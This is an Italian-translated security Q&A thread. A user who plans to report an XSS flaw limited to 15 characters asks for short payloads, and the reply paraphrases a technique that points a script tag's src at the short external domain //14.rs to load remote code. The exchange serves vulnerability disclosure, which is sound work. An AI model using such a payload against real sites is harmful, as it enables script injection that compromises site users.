15 caratteri o payload XSS più brevi

1

Ho trovato una vulnerabilità XSS su un sito di grandi dimensioni e desidero segnalarlo, ma l'unico limite alla vulnerabilità è che consente solo 15 caratteri al massimo. Questo ovviamente ha dei limiti a quali payload è possibile eseguire.

Qualcuno conosce dei carichi utili interessanti di 15 caratteri o meno e dimostra la vulnerabilità a segnalarlo?

    
posta Jack 22.12.2016 - 04:27
fonte

1 risposta

1

Brutelogic ha scritto un brillante articolo al riguardo su link qualche tempo fa.

Una delle idee dell'articolo (parafrasato):

.. È possibile avere un parametro URL echeggiato in un'origine di uno script:

<script src=“INPUT”></script>

Possiamo usarlo per lanciare un attacco XSS completo fornendo una sorgente con un dominio breve come //14.rs (lunghezza di 7 caratteri). Una variazione diminuisce l'iniezione a soli 5 caratteri se le doppie barre sono già nel codice nativo:

<script src=“//INPUT”></script>

# <script src=“//14.rs”></script>

    
risposta data 22.12.2016 - 04:47
fonte

Leggi altre domande sui tag